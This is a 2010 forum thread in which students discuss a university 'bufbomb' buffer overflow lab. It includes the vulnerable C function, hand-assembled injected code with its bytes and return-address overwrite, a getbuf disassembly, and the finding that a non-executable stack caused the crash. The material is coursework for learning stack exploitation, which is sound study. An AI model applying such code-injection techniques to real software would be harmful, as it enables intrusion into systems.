#1
  1. No Profile Picture
    Registered User
    Devshed Newbie (0 - 499 posts)

    Join Date
    Apr 2010
    Posts
    5
    Rep Power
    0

    [Solved]Buffer overflow exploit


    Hello, first time posting here... and first time asking for help on homework... but I really can't figure this out.

    The problem is as follows: There is a program in C called bufbomb that takes in an argument for my team name and a string. It uses the team name to call another program makecookie which creates a 4 byte hex code cookie. The string is provided by another program sendstring, which takes in a line of hex bytes and turns it into a string. All of this is on a RH8 Linux machine with gcc.

    Inside bufbomb there's a function getbuf()
    Code:
    int getbuf(){
           char buf[12]; 
           Gets(buf);
           return 1;
    }
    The objective is for the string to cause an overflow and change the return address. I have successfully finished the first two parts in which you just had to change the return address to another function. Now I'm stuck in the next part.

    I have to provide an exploit string that will change the value of a variable to the value of my cookie and then call a certain function.

    The variable is stored at 0x804a1bc, my cookie is 0x7b4bbfad, and the address of the function i need to go to is 0x8048d10.

    Code:
    movl    $0x7b4bbfad,0x804a1bc 
    pushl   $0x8048d10 
    ret
    When I assemble it and disassemble with objdump I get:
    Code:
    00000000 <.text>:
        0:	c7 05 bc a1 04 08 ad     movl   $0x7b4bbfad,0x804a1bc
        7:	bf 4b 7b
        a:	68 10 8d 04 08           push   $0x8048d10
        f:	c3                       ret
    Which tells me the exploit string should be "c7 05 bc a1 04 08 ad bf 4b 7b 68 10 8d 04 08" which is exactly the size of the buffer (overwriting %ebp). The address of the beginning of the buffer is 0xbfffb35c, so I tag on "5c b3 ff bf" to the end of the string. Now the return address has been overwritten to point to the beginning of the buffer and the exploit string takes up the entire buffer.

    From everything I've read and understood about the stack and buffer overflows, this should do the trick... however I'm getting a segmentation fault when getbuf() returns to 0xbfffb35c and it doesn't execute any of my code.

    I also tried setting the code after the stack pointer and filling the buffer with random stuff and overwriting the return address to the beginning of the exploit string and didn't work either.

    This homework is due tomorrow and I've been smashing my head against the wall for a few hours now... Any help would be greatly appreciated!!
    Last edited by aiguofer; April 18th, 2010 at 08:02 PM. Reason: solved
  2. #2
  3. Lord of Dorkness
    Devshed Supreme Being (6500+ posts)

    Join Date
    Jan 2004
    Location
    Central New York. Texan via Arizona, out of his element!
    Posts
    8,524
    Rep Power
    3319
    We don't do homework. I don't teach cracking to strangers that come strolling down the pike.
    Functionality rules and clarity matters; if you can work a little elegance in there, you're stylin'.
    If you can't spell "u", "ur", and "ne1", why would I hire you? 300 baud modem? Forget I mentioned it.
  4. #3
  5. No Profile Picture
    Registered User
    Devshed Newbie (0 - 499 posts)

    Join Date
    Apr 2010
    Posts
    5
    Rep Power
    0
    Originally Posted by DaWei_M
    We don't do homework. I don't teach cracking to strangers that come strolling down the pike.
    Thank you for your very insightful and helpful reply.

    Comments on this post

    • DaWei_M disagrees : You're entirely welcome.
    • Joseph Taylor agrees
  6. #4
  7. No Profile Picture
    Contributing User
    Devshed Novice (500 - 999 posts)

    Join Date
    Mar 2009
    Posts
    837
    Rep Power
    532
    Step through the code in a debugger.
  8. #5
  9. No Profile Picture
    Registered User
    Devshed Newbie (0 - 499 posts)

    Join Date
    Apr 2010
    Posts
    5
    Rep Power
    0
    Thanks but I finally figured it out.... I had it right all along, the problem was that I was trying to run the exploit on my system instead of the lab computer. Apparently my system doesn't allow the stack to execute so when it returned to the stack it would seg fault. Good to know that newer systems are more secure!

    This was a very interesting homework, I'll definitely try to make my programs more secure from now on!
  10. #6
  11. No Profile Picture
    Contributing User
    Devshed Novice (500 - 999 posts)

    Join Date
    Mar 2009
    Posts
    837
    Rep Power
    532
    DEP to the rescue, as I suspected.

    I'm still not sure why you said "but" - a debugger would have gotten you your answer very quickly; at least you could have verified that you computed your relative addressing to the variable correctly and such.

    I just tend to see a real lack of debugging skills from today's CS people as compared to even 15 years ago.
  12. #7
  13. No Profile Picture
    Registered User
    Devshed Newbie (0 - 499 posts)

    Join Date
    Apr 2010
    Posts
    5
    Rep Power
    0
    O yeah I was stepping through it with gdb... that's how I figured out all the values and relationships between stack pointers and addresses... The thing is as soon as it would hit the return statement it would give me a seg fault, even though the return address was pointing to the right place in the stack... However I didn't really know why it was doing that... I guess I should have guessed it but I was kind of burnt out on the whole thing and wasn't thinking straight anymore haha.

    This class has definitely helped me out a lot in understanding pointers, stacks, how the computer interprets code, how to use gdb... This is probably the most interesting class I've taken so far. Next project is optimizing a program in Y86.. should be interesting
  14. #8
  15. No Profile Picture
    Registered User
    Devshed Newbie (0 - 499 posts)

    Join Date
    Nov 2010
    Posts
    2
    Rep Power
    0
    Hey, firstly sorry for re-activating an old thread, but I cannot send a private message to the user.

    Aiguofer, I have the same issue as you. I am heading over to the lab just now, but I wanted to ask you just to be sure how did you find the return address of your exploit code? - Meaning how did you figure out the memory address of where your exploit code is saved?

    Help would be greatly appreciated!
  16. #9
  17. No Profile Picture
    Registered User
    Devshed Newbie (0 - 499 posts)

    Join Date
    Apr 2010
    Posts
    5
    Rep Power
    0
    Originally Posted by blackle89
    Hey, firstly sorry for re-activating an old thread, but I cannot send a private message to the user.

    Aiguofer, I have the same issue as you. I am heading over to the lab just now, but I wanted to ask you just to be sure how did you find the return address of your exploit code? - Meaning how did you figure out the memory address of where your exploit code is saved?

    Help would be greatly appreciated!
    Sorry... I actually don't remember that well. I think I just started looking at the contents of few addresses before the stack pointer until I found it.
  18. #10
  19. No Profile Picture
    Registered User
    Devshed Newbie (0 - 499 posts)

    Join Date
    Nov 2010
    Posts
    2
    Rep Power
    0
    Thanks so much for replying!

    If you have some time could you help me out a little bit?


    Dump of assembler code for function getbuf:
    0x08048b20 <+0>: push %ebp
    0x08048b21 <+1>: mov %esp,%ebp
    0x08048b23 <+3>: sub $0x28,%esp
    0x08048b26 <+6>: lea -0x14(%ebp),%eax
    0x08048b29 <+9>: mov %eax,(%esp)
    0x08048b2c <+12>: call 0x8048990 <Gets>
    0x08048b31 <+17>: mov $0x1,%eax
    0x08048b36 <+22>: leave
    0x08048b37 <+23>: ret

    That is my getbuf disassembly. I believe the string should be stored at the memory address -0x14(%ebp). This is 20 bytes away from ebp, and my disassembly byte code comes upto 16 bytes.

    So I write those 16 bytes, add 4 bytes of padding, 4 more bytes of what?, and lastly the 4 bytes of the return address (whichis hopefully -0x14(%ebp)).

    Yea?
    Anything coming back to you?

    I would really appreciate some help.

IMN logo majestic logo threadwatch logo seochat tools logo